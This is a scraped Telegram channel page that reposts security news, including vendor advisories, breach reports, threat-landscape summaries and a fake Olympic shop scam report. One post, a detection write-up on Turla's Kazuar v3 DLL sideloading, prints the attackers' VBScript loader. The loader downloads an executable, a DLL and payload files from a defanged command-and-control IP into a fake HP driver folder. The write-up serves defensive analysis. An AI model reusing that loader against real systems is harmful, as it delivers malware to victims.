malwarenews | Unsorted

Telegram-канал malwarenews - Malware News

1564

The most relevant and recent events in the world of information security https://malware.news All Projects: malwarecorp.com This channel is run by AI and BOT

Subscribe to a channel

Malware News

Secure Access Service Edge (SASE)

What is Secure Access Service Edge? Secure Access Service Edge (SASE) is a cloud-based approach that combines networking and security into one service so people can safely connect to company resources from anywhere. SASE represents a fundamental shift in how organizations approach network security and connectivity in today’s distributed work environment. Rather than treating networking ... Secure Access Service Edge (SASE)


Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.


Article Link:
Secure Access Service Edge (SASE) - Arctic Wolf

1 post - 1 participant

Read full topic

https://malware.news/t/secure-access-service-edge-sase/104114
https://malware.news/c/news.rss

Project: @MalwareNews
Private:
@MalwarePrivateBot
Group:
@MalwareForums
Powered by
@MalwareForum

Читать полностью…

Malware News

Check Point Unveils a New Security Strategy for Enterprises in the AI Age


Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.


Check Point is rolling out a new four-pillar cybersecurity strategy to give security teams an edge in the ongoing AI arms race with threat actors and is making three acquisitions that will play a critical role in getting it going.

The post
Check Point Unveils a New Security Strategy for Enterprises in the AI Age appeared first on Security Boulevard.

Article Link:
Check Point Unveils a New Security Strategy for Enterprises in the AI Age - Security Boulevard

1 post - 1 participant

Read full topic

https://malware.news/t/check-point-unveils-a-new-security-strategy-for-enterprises-in-the-ai-age/104112
https://malware.news/c/news.rss

Project: @MalwareNews
Private:
@MalwarePrivateBot
Group:
@MalwareForums
Powered by
@MalwareForum

Читать полностью…

Malware News

NDSS 2025 – Density Boosts Everything

Session 12B: Malware


Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.


Authors, Creators & Presenters: Jianwen Tian (Academy of Military Sciences), Wei Kong (Zhejiang Sci-Tech University), Debin Gao (Singapore Management University), Tong Wang (Academy of Military Sciences), Taotao Gu (Academy of Military Sciences), Kefan Qiu (Beijing Institute of Technology), Zhi Wang (Nankai University), Xiaohui Kuang (Academy of Military Sciences)

PAPER

Density Boosts Everything: A One-stop Strategy For Improving Performance, Robustness, And Sustainability of Malware Detectors

In the contemporary landscape of cybersecurity, AI-driven detectors have emerged as pivotal in the realm of malware detection. However, existing AI-driven detectors encounter a myriad of challenges, including poisoning attacks, evasion attacks, and concept drift, which stem from the inherent characteristics of AI methodologies. While numerous solutions have been proposed to address these issues, they often concentrate on isolated problems, neglecting the broader implications for other facets of malware detection. This paper diverges from the conventional approach by not targeting a singular issue but instead identifying one of the fundamental causes of these challenges, sparsity. Sparsity refers to a scenario where certain feature values occur with low frequency, being represented only a minimal number of times across the dataset. The authors are the first to elevate the significance of sparsity and link it to core challenges in the domain of malware detection, and then aim to improve performance, robustness, and sustainability simultaneously by solving sparsity problems. To address the sparsity problems, a novel compression technique is designed to effectively alleviate the sparsity. Concurrently, a density boosting training method is proposed to consistently fill sparse regions. Empirical results demonstrate that the proposed methodologies not only successfully bolster the model's resilience against different attacks but also enhance the performance and sustainability over time. Moreover, the proposals are complementary to existing defensive technologies and successfully demonstrate practical classifiers with improved performance and robustness to attacks.

ABOUT NDSS

The Network and Distributed System Security Symposium (NDSS) fosters information exchange among researchers and practitioners of network and distributed system security. The target audience includes those interested in practical aspects of network and distributed system security, with a focus on actual system design and implementation. A major goal is to encourage and enable the Internet community to apply, deploy, and advance the state of available security technologies.

Our thanks to the
Network and Distributed System Security (NDSS) Symposium for publishing their Creators, Authors and Presenter’s superb NDSSSymposium">NDSS Symposium 2025 Conference content on the Organizations' ndsssymposium?si=lLtn9sVVEwmZ8J9h3">YouTube Channel.

Permalink

The post
NDSS 2025 – Density Boosts Everything appeared first on Security Boulevard.

Article Link:
NDSS 2025 - Density Boosts Everything - Security Boulevard

1 post - 1 participant

Read full topic

https://malware.news/t/ndss-2025-density-boosts-everything/104110
https://malware.news/c/news.rss

Project: @MalwareNews
Private:
@MalwarePrivateBot
Group:
@MalwareForums
Powered by
@MalwareForum

Читать полностью…

Malware News

Google Chrome security advisory (AV26-126)


Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.


<div>
<div>


<div><p><strong>Serial number: </strong>AV26-126<br /><strong>Date: </strong>February 13, 2026</p>

On February 12, 2026, Google published a security advisory to address vulnerabilities in the following product:

— Stable Channel Chrome for Desktop – versions prior to 145.0.7632.68 (Windows/Mac) and 144.0.7559.67 (Linux)

The Cyber Centre encourages users and administrators to review the provided web link and apply the necessary updates, when available.

Google Chrome Security Advisory

</div>


Article Link:
Google Chrome security advisory (AV26-126) - Canadian Centre for Cyber Security

1 post - 1 participant

Read full topic

https://malware.news/t/google-chrome-security-advisory-av26-126/104108
https://malware.news/c/news.rss

Project: @MalwareNews
Private:
@MalwarePrivateBot
Group:
@MalwareForums
Powered by
@MalwareForum

Читать полностью…

Malware News

Detection Satelital DLL SideLoading via MFC — TURLA´S KAZUAR V3

Very good everyone.

Turla’s Kazuar is a .NET malware family attributed to Russian state-sponsored actors that, in recent campaigns, has taken DLL SideLoading a step further by leveraging certain MFC binaries compiled between Visual Studio .NET 2002 and Visual Studio 2010. These binaries attempt to load satellite DLLs in an insecure way due to an incorrect path specification, improper handling of data during loading, and a very curious “fallback” logic.

In this article we will model the early stages of the kill chain of this attack on a Windows endpoint, from the initial vector to the loader, where we will observe:

— Dropping files into user-writable paths (AppData/Temp/ProgramData) originating from scripting engines.
— Execution of a legitimate binary from an anomalous location.
— The loading of a DLL by the previous binary, both sharing a very similar naming convention.
— How these drop, load, and execution events show a clear correlation when modeling detection.

Let’s rock!

OVERVIEW — GENERAL FUNCTIONSExecution begins with a Visual Basic script without encoded strings; at first glance it may seem harmless. It is unknown whether the user executed the script as a result of social engineering or whether it was launched programmatically after a previous foothold.

'On Error Resume Next
const SXH_SERVER_CERT_IGNORE_ALL_SERVER_ERRORS = 13056
host = "https://185.126.255[.]132"

Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFolder = objFSO.CreateFolder(CreateObject("WScript.Shell").ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\Programs\HP")
Set objFolder = objFSO.CreateFolder(CreateObject("WScript.Shell").ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\Programs\HP\Printer")
Set objFolder = objFSO.CreateFolder(CreateObject("WScript.Shell").ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\Programs\HP\Printer\Driver")

conc = host + "
/hpbprndi.exe"
Set objHTTP = CreateObject("WinHttp.WinHttpRequest.5.1")
Set WSHShell = CreateObject("WScript.Shell")
objHttp.Option(4) = 13056
objHTTP.Open "GET", conc, False
objHttp.Send
outFile=WSHShell.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\Programs\HP\Printer\Driver\hpbprndi.exe"
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1
stream.Open
stream.Write objHttp.ResponseBody
stream.SaveToFile outFile, 2
stream.Close

conc = host + "
/hpbprndiLOC.dll"
objHttp.Option(4) = 13056
objHTTP.Open "GET", conc, False
objHttp.Send
outFile=WSHShell.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\Programs\HP\Printer\Driver\hpbprndiLOC.dll"
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1
stream.Open
stream.Write objHttp.ResponseBody
stream.SaveToFile outFile, 2
stream.Close

conc = host + "
/jayb.dadk"
objHttp.Option(4) = 13056
objHTTP.Open "GET", conc, False
objHttp.Send
outFile=WSHShell.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\Programs\HP\Printer\Driver\jayb.dadk"
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1
stream.Open
stream.Write objHttp.ResponseBody
stream.SaveToFile outFile, 2
stream.Close

conc = host + "
/kgjlj.sil"
objHttp.Option(4) = 13056
objHTTP.Open "GET", conc, False
objHttp.Send
outFile=WSHShell.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\Programs\HP\Printer\Driver\kgjlj.sil"
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1
stream.Open
stream.Write objHttp.ResponseBody
stream.SaveToFile outFile, 2
stream.Close

conc = host + "
/pkrfsu.ldy"
objHttp.Option(4) = 13056
objHTTP.Open "GET", conc, False
objHttp.Send
outFile=WSHShell.ExpandEnvironmentStrings("%LOCALAPPDATA%") + "\Programs\HP\Printer\Driver\pkrfsu.ldy"
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1
stream.Open
stream.Write objHttp.ResponseBody
stream.SaveToFile outFile,...


https://malware.news/t/detection-satelital-dll-sideloading-via-mfc-turla-s-kazuar-v3/104106
https://malware.news/c/news.rss

Project: @MalwareNews
Private:
@MalwarePrivateBot
Group:
@MalwareForums
Powered by
@MalwareForum

Читать полностью…

Malware News

PostgreSQL security advisory (AV26-125)


Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.


<div>
<div>


<div><p><strong>Serial number: </strong>AV26-125<br /><strong>Date: </strong>February 13, 2026</p>

On February 12, 2026, PostgreSQL published a security advisory to address vulnerabilities in the following products:

— PostgreSQL – 14.x versions prior to 14.21
— PostgreSQL – 15.x versions prior to 15.16
— PostgreSQL – 16.x versions prior to 16.12
— PostgreSQL – 17.x versions prior to 17.8
— PostgreSQL – 18.x versions prior to 18.2

The Cyber Centre encourages users and administrators to review the provided web links and apply the necessary updates.

PostgreSQL 18.2, 17.8, 16.12, 15.16, and 14.21 Released!
PostgreSQL Security Information

</div>


Article Link:
PostgreSQL security advisory (AV26-125) - Canadian Centre for Cyber Security

1 post - 1 participant

Read full topic

https://malware.news/t/postgresql-security-advisory-av26-125/104104
https://malware.news/c/news.rss

Project: @MalwareNews
Private:
@MalwarePrivateBot
Group:
@MalwareForums
Powered by
@MalwareForum

Читать полностью…

Malware News

Korea’s Personal Information Protection Commissioner fines 3 LVMH luxury brands after Salesforce data breaches

The South Korean regulator has imposed fines on three LVMH luxury brands in the wake of data breaches previously reported on this site. A machine translation of the South Korean notice indicates that the Personal Information Protection Commission imposed fines of  36.033 billion won USD $24,925,824.15 and penalties of 10.8 million won $7,472.78. on three luxury...


Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.


Source

Article Link:
Korea’s Personal Information Protection Commissioner fines 3 LVMH luxury brands after Salesforce data breaches – DataBreaches.Net

1 post - 1 participant

Read full topic

https://malware.news/t/korea-s-personal-information-protection-commissioner-fines-3-lvmh-luxury-brands-after-salesforce-data-breaches/104102
https://malware.news/c/news.rss

Project: @MalwareNews
Private:
@MalwarePrivateBot
Group:
@MalwareForums
Powered by
@MalwareForum

Читать полностью…

Malware News

Top Nation-State Cyber Threats Targeting the United States

Top Nation-State Cyber Threats Targeting the United States


Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.


Most cyber risk in the United States starts with something simple: stolen data and stolen access getting traded for profit. In SOCRadar’s 2026 U.S. Threat Landscape Report, selling made up 70.76% of observed Dark Web activity. In other words, attackers kept feeding a marketplace where credentials and entry points move quickly from one hand to another.

That matters because it shapes the environment nation-state operators work in. They do not need to “invent” new entry paths when the underground economy already supplies access,
phishing kits, and infrastructure at scale. At the same time, the motives diverge. Many criminal crews chase payment, but state-linked groups often chase long-term visibility: the inboxes, identity systems, telecom environments, and third-party pathways that influence decisions, expose relationships, or enable quiet persistence.

This post focuses on that second category. It breaks down the state-linked clusters most worth tracking, what they typically target in the United States, and the patterns behind how they run these operations.

Nation-state threats targeting the U.S.

For wider U.S.-specific context beyond nation-state activity,
SOCRadar’s 2026 U.S. Threat Landscape Report also covers the most targeted industries, how threat actors monetize stolen data and access, and how ransomware, phishing, and DDoS continue to pressure U.S. organizations.

China-Related Espionage and Long-Dwell Access
China-nexus operations tend to prioritize intelligence collection, persistent access, and strategic positioning inside communications and government-adjacent environments. In practice, that often means targeting email, identity, and infrastructure that enables downstream visibility into sensitive conversations.

Salt Typhoon
Salt Typhoon became a widely cited example of access that matters rather than smash-and-grab theft: get inside the pipes, stay quiet, and collect.

Threat actor card of Salt Typhoon

In January 2026, Salt Typhoon compromised email systems used by staff associated with major U.S. House committees, with uncertainty at the time about the depth of access and whether lawmakers’ emails were compromised.

A February 2026 Senate letter framed this activity as part of broader telecom security concerns and urged an oversight hearing with major carriers, including AT&T and Verizon. It also referenced FBI-reported scope, describing targeting of more than 200 U.S. organizations and activity spanning 80 countries, while citing reporting that the actors may have remained inside U.S. telecom networks.

A state-level advisory style
recap from NJCCIC also summarized the committee-email targeting and reinforced the telecom-focused context.

How these operations tend to work

— Target the communications layer to gain strategic collection options (email systems, telecom environments, and the identity infrastructure around them).
— Prioritize persistence so access survives password resets and partial remediation cycles.
— Blend technical access with operational security, keeping activity low-noise and selective.

APT5
APT5 activity tied to U.S. and allied defense ecosystems showed a different but complementary approach: target people with believable context, including outside corporate controls.

A recent
Google threat intelligence write-up described APT5 spearphishing campaigns that went after current and former employees of major aerospace and defense contractors, including messages...

https://malware.news/t/top-nation-state-cyber-threats-targeting-the-united-states/104097
https://malware.news/c/news.rss

Project: @MalwareNews
Private:
@MalwarePrivateBot
Group:
@MalwareForums
Powered by
@MalwareForum

Читать полностью…

Malware News

Fake shops target Winter Olympics 2026 fans

If you’ve seen the two stoat siblings serving as official mascots of the Milano Cortina 2026 Winter Olympics, you already know Tina and Milo are irresistible.


Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.


Designed by Italian schoolchildren and chosen from more than 1,600 entries in a public poll, the duo has already captured hearts worldwide. So much so that the official 27 cm Tina plush toy on the official Olympics web shop is listed at €40 and currently marked out of stock.

Tina and Milo are in huge demand, and scammers have noticed.

When supply runs out, scam sites rush in
In roughly the past week alone, we’ve identified nearly 20 lookalike domains designed to imitate the official Olympic merchandise store.

These aren’t crude copies thrown together overnight. The sites use the same polished storefront template, complete with promotional videos and background music designed to mirror the official
shop.olympics.com experience.

Fake site offering Tina at a huge discount

Real Olympic site showing Tina out of stock

The layout and product pages are the same—the only thing that changes is the domain name. At a quick glance, most people wouldn’t notice anything unusual.

Here’s a sample of the domains we’ve been tracking:

2026winterdeals[.]top
olympics-save[.]top
olympics2026[.]top
postolympicsale[.]com
sale-olympics[.]top
shopolympics-eu[.]top
winter0lympicsstore[.]top (note the zero replacing the letter “o”)
winterolympics[.]top
2026olympics[.]shop
olympics-2026[.]shop
olympics-2026[.]top
olympics-eu[.]top
olympics-hot[.]shop
olympics-hot[.]top
olympics-sale[.]shop
olympics-sale[.]top
olympics-top[.]shop
olympics2026[.]store
olympics2026[.]top

Based on telemetry, additional registrations are actively emerging.

Reports show users checking these domains from multiple regions including Ireland, the Czech Republic, the United States, Italy, and China—suggesting this is a global campaign targeting fans worldwide.

Malwarebytes blocks these domains as scams.

Anatomy of a fake Olympic shop
The fake sites are practically identical. Each one loads the same storefront, with the same layout, product pages, and promotional banners.

That’s usually a sign the scammers are using a ready-made template and copying it across multiple domains. One obvious giveaway, however, is the pricing.

On the official store, the Tina plush costs €40 and is currently out of stock. On the fake sites, it suddenly reappears at a hugely discounted price—in one case €20, with banners shouting “UP & SAVE 80%.” When an item is sold out everywhere official and a random .top domain has it for half price, you’re looking at bait.

The goal of these sites typically includes:

— Stealing payment card details entered at checkout
— Harvesting
personal information such as names, addresses, and phone numbers
— Sending follow-up
phishing emails
— Delivering
malware through fake order confirmations or “tracking” links
— Taking your money and shipping nothing at all

The Olympics are a scammer’s playground
This isn’t the first time cybercriminals have piggybacked on Olympic fever. Fake ticket sites proliferated as far back as the Beijing 2008 Games. During Paris 2024, analysts observed significant spikes in Olympics-themed phishing and
DDoS activity.

The formula is simple. Take a globally recognized brand, add urgency and emotional appeal (who doesn’t want an adorable stoat plush for their kid?), mix in limited availability, and serve it up on a convincing-looking website. With over 3 billion viewers expected for Milano Cortina, the pool of potential victims is...


https://malware.news/t/fake-shops-target-winter-olympics-2026-fans/104095
https://malware.news/c/news.rss

Project: @MalwareNews
Private:
@MalwarePrivateBot
Group:
@MalwareForums
Powered by
@MalwareForum

Читать полностью…

Malware News

AI-Powered Knowledge Graph Generator & APTs, (Thu, Feb 12th)

Unstructured text to interactive knowledge graph via LLM & SPO triplet extraction


Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.


Article Link:
AI-Powered Knowledge Graph Generator & APTs - SANS ISC

1 post - 1 participant

Read full topic

https://malware.news/t/ai-powered-knowledge-graph-generator-apts-thu-feb-12th/104093
https://malware.news/c/news.rss

Project: @MalwareNews
Private:
@MalwarePrivateBot
Group:
@MalwareForums
Powered by
@MalwareForum

Читать полностью…

Malware News

AI Weaponization: State Hackers Using Google Gemini for Espionage and Malware Generation

What Happened Google’s Threat Intelligence Group (GTIG) has confirmed that multiple state-sponsored hacking groups are actively using its Gemini large language model (LLM) to enhance their cyber espionage and attack capabilities. The activity spans reconnaissance, social engineering, vulnerability analysis, and the dynamic generation of malicious code. North Korean (UNC2970/Lazarus Group), Chinese (Mustang Panda, APT31, APT41), [...]


Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.


Article Link:
AI Weaponization: State Hackers Using Google Gemini for Espionage and Malware Generation - Cyberwarzone

1 post - 1 participant

Read full topic

https://malware.news/t/ai-weaponization-state-hackers-using-google-gemini-for-espionage-and-malware-generation/104090
https://malware.news/c/news.rss

Project: @MalwareNews
Private:
@MalwarePrivateBot
Group:
@MalwareForums
Powered by
@MalwareForum

Читать полностью…

Malware News

The Most Important Thing I’ve Read This Year

Lawyers and judges need to stop snickering at the sad sacks who file briefs citing hallucinated authorities and treating those ...

Continue reading →


Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.


Article Link:
The Most Important Thing I’ve Read This Year | Ball in your Court

1 post - 1 participant

Read full topic

https://malware.news/t/the-most-important-thing-i-ve-read-this-year/104088
https://malware.news/c/news.rss

Project: @MalwareNews
Private:
@MalwarePrivateBot
Group:
@MalwareForums
Powered by
@MalwareForum

Читать полностью…

Malware News

It’s 2026, but hospitals still haven’t prevented snooping in celebrities’ records

DataBreaches is not on TikTok and, being something of a dinosaur, never heard of “Josh and Jase” before. But no patient should have their privacy violated the ways Josh’s was. What happened to “break the glass?” What happened to all the software and auditing protections to prevent hospital employees from snooping on celebrity patients’ records?..


Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.


Source

Article Link:
It’s 2026, but hospitals still haven’t prevented snooping in celebrities’ records – DataBreaches.Net

1 post - 1 participant

Read full topic

https://malware.news/t/it-s-2026-but-hospitals-still-haven-t-prevented-snooping-in-celebrities-records/104086
https://malware.news/c/news.rss

Project: @MalwareNews
Private:
@MalwarePrivateBot
Group:
@MalwareForums
Powered by
@MalwareForum

Читать полностью…

Malware News

ApolloMD reveals that 626,540 patients were affected by May, 2025 cyberattack

There is an update to a breach previously reported on DataBreaches.net. ApolloMD describes itself as a private, independent group of physicians that partners with more than 100 hospitals nationwide to provide integrated, multispecialty physician, Ambulatory Payment Classifications (APCs), and practice management services. As such, they are business associates of HIPAA-covered entities. This week, the Georgia-based...


Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.


Source

Article Link:
ApolloMD reveals that 626,540 patients were affected by May, 2025 cyberattack – DataBreaches.Net

1 post - 1 participant

Read full topic

https://malware.news/t/apollomd-reveals-that-626-540-patients-were-affected-by-may-2025-cyberattack/104084
https://malware.news/c/news.rss

Project: @MalwareNews
Private:
@MalwarePrivateBot
Group:
@MalwareForums
Powered by
@MalwareForum

Читать полностью…

Malware News

Threat Intelligence Snapshot: Week 7, 2026

QuoIntelligence’s Weekly Intelligence Snapshot for the week of 5 to 11 February 2026 is now available!


Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.


Want to read the full story?
Subscribe to our newsletter to access the complete Weekly Intelligence Snapshot. Don’t miss out on more intelligence!

Cyber Highlights
Industry impacted: Communication Services, Consumer Discretionary, Consumer Staples, Energy, Financials, Government, Health Care, Industrials, Information Technology, Materials, Real Estate, Utilities

Microsoft Exchange URL Rule Error Triggers Widespread Email Quarantine
ZeroDayRAT Cross Platform Android and iOS Spyware with Broad Surveillance Capabilities
SSHStalker Campaign Demonstrating Automated SSH Compromise and IRC‑based Botnet Control
Researchers Find Rogue Virtual Machine Revealing Scattered Spider’s New Operational Methods
DPRK Operatives Exploit Verified LinkedIn Profiles for Remote‑Work Fraud
Abuse of Net Monitor and SimpleHelp for Dual Remote Access in Ransomware and Cryptocurrency Theft Operations
URL Hijack in Outlook Add‑In Leads to Unauthorized Credential Collection

Geopolitical and Policy Highlights
Industry impacted: Government

European Commission Launches Action Plan to Address Drone Security Risks
EU Implements 20th Sanctions Package to Sustain Strategic Pressure on Russia Amid War in Ukraine

The post
Threat Intelligence Snapshot: Week 7, 2026 appeared first on QuoIntelligence.

Article Link:
Threat Intelligence Snapshot: Week 7, 2026 - QuoIntelligence

1 post - 1 participant

Read full topic

https://malware.news/t/threat-intelligence-snapshot-week-7-2026/104082
https://malware.news/c/news.rss

Project: @MalwareNews
Private:
@MalwarePrivateBot
Group:
@MalwareForums
Powered by
@MalwareForum

Читать полностью…

Malware News

South Korea blames Coupang data breach on management failure, not sophisticated attack

Heekyong Yang and Hyunjoo Jin report:  South Korean officials blamed a massive data leak last year at Coupang on management failure, rather than a sophisticated cyberattack, and urged the e-commerce giant to fix vulnerabilities in its security systems. Announcing the first findings of a government-led probe, the Science Ministry said on Tuesday a former Coupang...


Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.


Source

Article Link:
South Korea blames Coupang data breach on management failure, not sophisticated attack – DataBreaches.Net

1 post - 1 participant

Read full topic

https://malware.news/t/south-korea-blames-coupang-data-breach-on-management-failure-not-sophisticated-attack/104113
https://malware.news/c/news.rss

Project: @MalwareNews
Private:
@MalwarePrivateBot
Group:
@MalwareForums
Powered by
@MalwareForum

Читать полностью…

Malware News

CISA to furlough most of its workforce under impending DHS shutdown

<p>A likely partial government shutdown after Friday would impair the Cybersecurity and Infrastructure Security Agency’s operations, leading to diminished capabilities in critical areas including cyber response, security assessments, stakeholder engagements, training exercises and special event planning, a top official said this week.</p>


Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.


<p>CISA would furlough a majority of its workforce and just one-third would remain on the job under shutdown conditions, agency acting director Madhu Gottumukkala told House appropriators on Wednesday. </p>

<p>“I want to be clear — when the government shuts down, cyber threats do not,” he said.</p>

<p>The impending shutdown of the Department of Homeland Security — CISA’s parent agency — comes after Congress granted the department a two-week funding extension following high-profile Immigration and Customs Enforcement shootings in Minneapolis. Democrats have seized upon those incidents to advocate for funding overhauls for ICE and U.S. Customs and Border Protection, which have played central roles in the Trump administration’s maximalist deportation efforts.</p>

<p>The cyberdefense agency’s work would be “strictly limited to those that are essential to protecting life and property” and available staff will “only look at anything that is an immediate need and an imminent threat,” said Gottumukkala, adding that the agency will be unable to proactively scan for cyber vulnerabilities.</p>

<p>The shutdown would also slow ongoing revamps of a major cyber incident reporting rule that was signed into law in 2022, he said. The Cyber Incident Reporting for Critical Infrastructure Act directed CISA to enact a final rule by October 2025, though that deadline has been extended to this May. CISA <a href=“
https://public-inspection.federalregister.gov/2026-02948.pdf”>announced</a> a series of listening sessions for CIRCIA on Thursday.</p>

<p>The cyberdefense agency has already lost approximately one-third of its workforce over the past year amid various Trump 2.0 efficiency plans and mechanisms aimed at shedding purported government bloat and wasteful spending.</p>

Article Link:
CISA to furlough most of its workforce under impending DHS shutdown - Nextgov/FCW

1 post - 1 participant

Read full topic

https://malware.news/t/cisa-to-furlough-most-of-its-workforce-under-impending-dhs-shutdown/104111
https://malware.news/c/news.rss

Project: @MalwareNews
Private:
@MalwarePrivateBot
Group:
@MalwareForums
Powered by
@MalwareForum

Читать полностью…

Malware News

HPE security advisory (AV26-127)


Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.


<div>
<div>


<div><p><strong>Serial number: </strong>AV26-127<br /><strong>Date: </strong>February 13, 2026</p>

On February 12, 2026, HPE published security advisories to address vulnerabilities in the following products:

— HPE SimpliVity 380 Gen11 – versions prior to SimpliVity Support Pack Gen11 (SVTSPGen11) 2026_0116
— HPE SimpliVity 380 Gen10 Plus – versions prior to SimpliVity Support Pack Gen10 (SVTSPGen10) 2026_0116

The Cyber Centre encourages users and administrators to review the provided web links and apply the necessary updates.

HPESBHF04937 rev.1 - Certain HPE SimpliVity Servers Using Certain Intel Processors, INTEL-SA-01280, 2025.3 IPU, Intel Chipset Firmware Advisory, Multiple Vulnerabilities
PESBHF04938 rev.1 - Certain HPE SimpliVity Servers Using Certain Intel Processors, INTEL-SA-01313, 2025.3 IPU, Intel Xeon Processor Firmware Advisory, Multiple Vulnerabilities
HPESBHF04939 rev.1 - Certain HPE SimpliVity Servers Using Certain Intel Processors, INTEL-SA-01312, Intel TDX Module Advisory, Multiple Vulnerabilities
HPE Security Bulletin Library

</div>


Article Link:
https://cyber.gc.ca/en/alerts-advisories/hpe-security-advisory-av26-127

1 post - 1 participant

Read full topic

https://malware.news/t/hpe-security-advisory-av26-127/104109
https://malware.news/c/news.rss

Project: @MalwareNews
Private:
@MalwarePrivateBot
Group:
@MalwareForums
Powered by
@MalwareForum

Читать полностью…

Malware News

Sintesi riepilogativa delle campagne malevole nella settimana del 7 – 13 febbraio

In questa settimana, il CERT-AGID ha riscontrato ed analizzato, nello scenario italiano di suo riferimento, un totale di 108 campagne malevole, di cui 68 con obiettivi italiani e 40 generiche che hanno comunque interessato l’Italia, mettendo a disposizione dei suoi enti accreditati i relativi 882 indicatori di compromissione (IoC) individuati.


Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.


Article Link:
Sintesi riepilogativa delle campagne malevole nella settimana del 7 – 13 febbraio – CERT-AGID

1 post - 1 participant

Read full topic

https://malware.news/t/sintesi-riepilogativa-delle-campagne-malevole-nella-settimana-del-7-13-febbraio/104107
https://malware.news/c/news.rss

Project: @MalwareNews
Private:
@MalwarePrivateBot
Group:
@MalwareForums
Powered by
@MalwareForum

Читать полностью…

Malware News

MITRE ATT&CK® Framework Beginners Guide


Introduction to Malware Binary Triage (IMBT) Course
Looking to level up your skills? Get 10% off using coupon code: MWNEWS10 for any flavor.

Enroll Now and Save 10%: Coupon Code MWNEWS10

Note: Affiliate link – your enrollment helps support this platform at no extra cost to you.




This guide is designed for you to get acomprehensive understanding ofthe MITRE ATT&CK Framework and explore how you can utilize it for your organization.

Article Link:
MITRE ATT&CK® Framework Beginners Guide

1 post - 1 participant

Read full topic

https://malware.news/t/mitre-att-ck-framework-beginners-guide/104105
https://malware.news/c/news.rss

Project: @MalwareNews
Private:
@MalwarePrivateBot
Group:
@MalwareForums
Powered by
@MalwareForum

Читать полностью…

Malware News

How to find and remove credential-stealing Chrome extensions

Researchers have found yet another family of malicious extensions in the Chrome Web Store. This time, 30 different Chrome extensions were found stealing credentials from more than 260,000 users.


Introduction to Malware Binary Triage (IMBT) Course
